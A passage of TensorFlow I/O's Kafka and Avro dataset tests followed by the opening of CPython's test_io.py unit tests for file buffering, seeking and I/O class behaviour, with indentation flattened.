# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
# ==============================================================================
"""Tests for Kafka Output Sequence."""
import sys
import time
import pytest
import numpy as np
import threading
import tensorflow as tf
import tensorflow_io as tfio
def test_kafka_io_tensor():
kafka = tfio.IOTensor.from_kafka("test")
assert kafka.dtype == tf.string
assert kafka.shape.as_list() == [None]
assert np.all(
kafka.to_tensor().numpy() == [("D" + str(i)).encode() for i in range(10)]
)
assert len(kafka.to_tensor()) == 10
@pytest.mark.skip(reason="TODO")
def test_kafka_output_sequence():
"""Test case based on fashion mnist tutorial"""
fashion_mnist = tf.keras.datasets.fashion_mnist
((train_images, train_labels), (test_images, _)) = fashion_mnist.load_data()
class_names = [
"T-shirt/top",
"Trouser",
"Pullover",
"Dress",
"Coat",
"Sandal",
"Shirt",
"Sneaker",
"Bag",
"Ankle boot",
]
train_images = train_images / 255.0
test_images = test_images / 255.0
model = tf.keras.Sequential(
[
tf.keras.layers.Flatten(input_shape=(28, 28)),
tf.keras.layers.Dense(128, activation=tf.nn.relu),
tf.keras.layers.Dense(10, activation=tf.nn.softmax),
]
)
model.compile(
optimizer="adam", loss="sparse_categorical_crossentropy", metrics=["accuracy"]
)
model.fit(train_images, train_labels, epochs=5)
class OutputCallback(tf.keras.callbacks.Callback):
"""KafkaOutputCallback"""
def __init__(
self, batch_size, topic, servers
): # pylint: disable=super-init-not-called
self._sequence = kafka_ops.KafkaOutputSequence(topic=topic, servers=servers)
self._batch_size = batch_size
def on_predict_batch_end(self, batch, logs=None):
index = batch * self._batch_size
for outputs in logs["outputs"]:
for output in outputs:
self._sequence.setitem(index, class_names[np.argmax(output)])
index += 1
def flush(self):
self._sequence.flush()
channel = "e{}e".format(time.time())
topic = "test_" + channel
# By default batch size is 32
output = OutputCallback(32, topic, "localhost")
predictions = model.predict(test_images, callbacks=[output])
output.flush()
predictions = [class_names[v] for v in np.argmax(predictions, axis=1)]
# Reading from `test_e(time)e` we should get the same result
dataset = tfio.kafka.KafkaDataset(topics=[topic], group="test", eof=True)
for entry, prediction in zip(dataset, predictions):
assert entry.numpy() == prediction.encode()
def test_avro_kafka_dataset():
"""test_avro_kafka_dataset"""
import tensorflow_io.kafka as kafka_io
schema = (
'{"type":"record","name":"myrecord","fields":['
'{"name":"f1","type":"string"},'
'{"name":"f2","type":"long"},'
'{"name":"f3","type":["null","string"],"default":null}'
"]}"
)
dataset = kafka_io.KafkaDataset(["avro-test:0"], group="avro-test", eof=True)
# remove kafka framing
dataset = dataset.map(lambda e: tf.strings.substr(e, 5, -1))
# deserialize avro
dataset = dataset.map(
lambda e: tfio.experimental.serialization.decode_avro(e, schema=schema)
)
entries = [
(e["f1"].numpy().decode(), e["f2"].numpy(), e["f3"].numpy().decode())
for e in dataset
]
assert np.all(entries == [("value1", 1, ""), ("value2", 2, "2"), ("value3", 3, "")])
def test_kafka_stream_dataset():
dataset = tfio.IODataset.stream().from_kafka("test").batch(2)
assert np.all(
[k.numpy().tolist() for (k, _) in dataset]
== np.asarray([("D" + str(i)).encode() for i in range(10)]).reshape((5, 2))
)
def test_kafka_io_dataset():
dataset = tfio.IODataset.from_kafka(
"test", configuration=["fetch.min.bytes=2"]
).batch(2)
# repeat multiple times will result in the same result
for _ in range(5):
assert np.all(
[k.numpy().tolist() for (k, _) in dataset]
== np.asarray([("D" + str(i)).encode() for i in range(10)]).reshape((5, 2))
)
def test_avro_encode_decode():
"""test_avro_encode_decode"""
schema = (
'{"type":"record","name":"myrecord","fields":'
'[{"name":"f1","type":"string"},{"name":"f2","type":"long"}]}'
)
value = [("value1", 1), ("value2", 2), ("value3", 3)]
f1 = tf.cast([v[0] for v in value], tf.string)
f2 = tf.cast([v[1] for v in value], tf.int64)
message = tfio.experimental.serialization.encode_avro([f1, f2], schema=schema)
entries = tfio.experimental.serialization.decode_avro(message, schema=schema)
assert np.all(entries["f1"].numpy() == f1.numpy())
assert np.all(entries["f2"].numpy() == f2.numpy())
def test_kafka_group_io_dataset_primary_cg():
"""Test the functionality of the KafkaGroupIODataset when the consumer group
is being newly created.
NOTE: After the kafka cluster is setup during the testing phase, 10 messages
are written to the 'key-partition-test' topic with 5 in each partition
(topic created with 2 partitions, the messages are split based on the keys).
And the same 10 messages are written into the 'key-test' topic (topic created
with 1 partition, so no splitting of the messages based on the keys).
K0:D0, K1:D1, K0:D2, K1:D3, K0:D4, K1:D5, K0:D6, K1:D7, K0:D8, K1:D9.
Here, messages D0, D2, D4, D6 and D8 are written into partition 0 and the rest are written
into partition 1.
Also, since the messages are read from different partitions, the order of retrieval may not be
the same as storage. Thus, we sort and compare.
"""
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test"],
group_id="cgtestprimary",
servers="localhost:9092",
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"auto.offset.reset=earliest",
],
)
assert np.all(
sorted([k.numpy() for (k, _) in dataset])
== sorted([("D" + str(i)).encode() for i in range(10)])
)
def test_kafka_group_io_dataset_primary_cg_no_lag():
"""Test the functionality of the KafkaGroupIODataset when the
consumer group has read all the messages and committed the offsets.
"""
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test"],
group_id="cgtestprimary",
servers="localhost:9092",
configuration=["session.timeout.ms=7000", "max.poll.interval.ms=8000"],
)
assert np.all(sorted([k.numpy() for (k, _) in dataset]) == [])
def test_kafka_group_io_dataset_primary_cg_new_topic():
"""Test the functionality of the KafkaGroupIODataset when the existing
consumer group reads data from a new topic.
"""
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-test"],
group_id="cgtestprimary",
servers="localhost:9092",
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"auto.offset.reset=earliest",
],
)
assert np.all(
sorted([k.numpy() for (k, _) in dataset])
== sorted([("D" + str(i)).encode() for i in range(10)])
)
def test_kafka_group_io_dataset_resume_primary_cg():
"""Test the functionality of the KafkaGroupIODataset when the
consumer group is yet to catch up with the newly added messages only
(Instead of reading from the beginning).
"""
import tensorflow_io.kafka as kafka_io
# Write new messages to the topic
for i in range(10, 100):
message = "D{}".format(i)
kafka_io.write_kafka(message=message, topic="key-partition-test")
# Read only the newly sent 90 messages
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test"],
group_id="cgtestprimary",
servers="localhost:9092",
configuration=["session.timeout.ms=7000", "max.poll.interval.ms=8000"],
)
assert np.all(
sorted([k.numpy() for (k, _) in dataset])
== sorted([("D" + str(i)).encode() for i in range(10, 100)])
)
def test_kafka_group_io_dataset_resume_primary_cg_new_topic():
"""Test the functionality of the KafkaGroupIODataset when the
consumer group is yet to catch up with the newly added messages only
(Instead of reading from the beginning) from the new topic.
"""
import tensorflow_io.kafka as kafka_io
# Write new messages to the topic
for i in range(10, 100):
message = "D{}".format(i)
kafka_io.write_kafka(message=message, topic="key-test")
# Read only the newly sent 90 messages
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-test"],
group_id="cgtestprimary",
servers="localhost:9092",
configuration=["session.timeout.ms=7000", "max.poll.interval.ms=8000"],
)
assert np.all(
sorted([k.numpy() for (k, _) in dataset])
== sorted([("D" + str(i)).encode() for i in range(10, 100)])
)
def test_kafka_group_io_dataset_secondary_cg():
"""Test the functionality of the KafkaGroupIODataset when a
secondary consumer group is created and is yet to catch up all the messages,
from the beginning.
"""
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test"],
group_id="cgtestsecondary",
servers="localhost:9092",
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"auto.offset.reset=earliest",
],
)
assert np.all(
sorted([k.numpy() for (k, _) in dataset])
== sorted([("D" + str(i)).encode() for i in range(100)])
)
def test_kafka_group_io_dataset_tertiary_cg_multiple_topics():
"""Test the functionality of the KafkaGroupIODataset when a new
consumer group reads data from multiple topics from the beginning.
"""
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test", "key-test"],
group_id="cgtesttertiary",
servers="localhost:9092",
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"auto.offset.reset=earliest",
],
)
assert np.all(
sorted([k.numpy() for (k, _) in dataset])
== sorted([("D" + str(i)).encode() for i in range(100)] * 2)
)
def test_kafka_group_io_dataset_auto_offset_reset():
"""Test the functionality of the `auto.offset.reset` configuration
at global and topic level"""
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test"],
group_id="cgglobaloffsetearliest",
servers="localhost:9092",
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"auto.offset.reset=earliest",
],
)
assert np.all(
sorted([k.numpy() for (k, _) in dataset])
== sorted([("D" + str(i)).encode() for i in range(100)])
)
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test"],
group_id="cgglobaloffsetlatest",
servers="localhost:9092",
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"auto.offset.reset=latest",
],
)
assert np.all(sorted([k.numpy() for (k, _) in dataset]) == [])
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test"],
group_id="cgtopicoffsetearliest",
servers="localhost:9092",
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"conf.topic.auto.offset.reset=earliest",
],
)
assert np.all(
sorted([k.numpy() for (k, _) in dataset])
== sorted([("D" + str(i)).encode() for i in range(100)])
)
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test"],
group_id="cgtopicoffsetlatest",
servers="localhost:9092",
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"conf.topic.auto.offset.reset=latest",
],
)
assert np.all(sorted([k.numpy() for (k, _) in dataset]) == [])
def test_kafka_group_io_dataset_invalid_stream_timeout():
"""Test the functionality of the KafkaGroupIODataset when the
consumer is configured to have an invalid stream_timeout value which is
less than the message_timeout value.
NOTE: The default value for message_timeout=5000
"""
STREAM_TIMEOUT = -20
try:
tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test", "key-test"],
group_id="cgteststreaminvalid",
servers="localhost:9092",
stream_timeout=STREAM_TIMEOUT,
configuration=["session.timeout.ms=7000", "max.poll.interval.ms=8000"],
)
except ValueError as e:
assert str(
e
) == "Invalid stream_timeout value: {} ,set it to -1 to block indefinitely.".format(
STREAM_TIMEOUT
)
def test_kafka_group_io_dataset_stream_timeout_check():
"""Test the functionality of the KafkaGroupIODataset when the
consumer is configured to have a valid stream_timeout value and thus waits
for the new messages from kafka.
NOTE: The default value for message_timeout=5000
"""
import tensorflow_io.kafka as kafka_io
def write_messages_background():
# Write new messages to the topic in a background thread
time.sleep(6)
for i in range(100, 200):
message = "D{}".format(i)
kafka_io.write_kafka(message=message, topic="key-partition-test")
dataset = tfio.experimental.streaming.KafkaGroupIODataset(
topics=["key-partition-test"],
group_id="cgteststreamvalid",
servers="localhost:9092",
stream_timeout=20000,
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"auto.offset.reset=earliest",
],
)
# start writing the new messages to kafka using the background job.
# the job sleeps for some time (< stream_timeout) and then writes the
# messages into the topic.
thread = threading.Thread(target=write_messages_background, args=())
thread.daemon = True
thread.start()
# At the end, after the timeout has occurred, we must have the old 100 messages
# along with the new 100 messages
assert np.all(
sorted([k.numpy() for (k, _) in dataset])
== sorted([("D" + str(i)).encode() for i in range(200)])
)
def test_kafka_batch_io_dataset():
"""Test the functionality of the KafkaBatchIODataset by training a model
directly on the incoming kafka message batch(of type tf.data.Dataset), in an
online-training fashion.
NOTE: This kind of dataset is suitable in scenarios where the 'keys' of 'messages'
act as labels. If not, additional transformations are required.
"""
dataset = tfio.experimental.streaming.KafkaBatchIODataset(
topics=["mini-batch-test"],
group_id="cgminibatch",
servers=None,
stream_timeout=5000,
configuration=[
"session.timeout.ms=7000",
"max.poll.interval.ms=8000",
"auto.offset.reset=earliest",
],
)
NUM_COLUMNS = 1
model = tf.keras.Sequential(
[
tf.keras.layers.Input(shape=(NUM_COLUMNS,)),
tf.keras.layers.Dense(4, activation="relu"),
tf.keras.layers.Dropout(0.1),
tf.keras.layers.Dense(1, activation="sigmoid"),
]
)
model.compile(
optimizer="adam",
loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
metrics=["accuracy"],
)
assert issubclass(type(dataset), tf.data.Dataset)
for mini_d in dataset:
mini_d = mini_d.map(
lambda m, k: (
tf.strings.to_number(m, out_type=tf.float32),
tf.strings.to_number(k, out_type=tf.float32),
)
).batch(2)
assert issubclass(type(mini_d), tf.data.Dataset)
# Fits the model as long as the data keeps on streaming
model.fit(mini_d, epochs=5)
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
if test is pipe_writer and not threading:
continue # Skip subtest that uses a background thread
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test comsumes large resources; It takes
# a long time to build the >2GB file and takes >2GB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
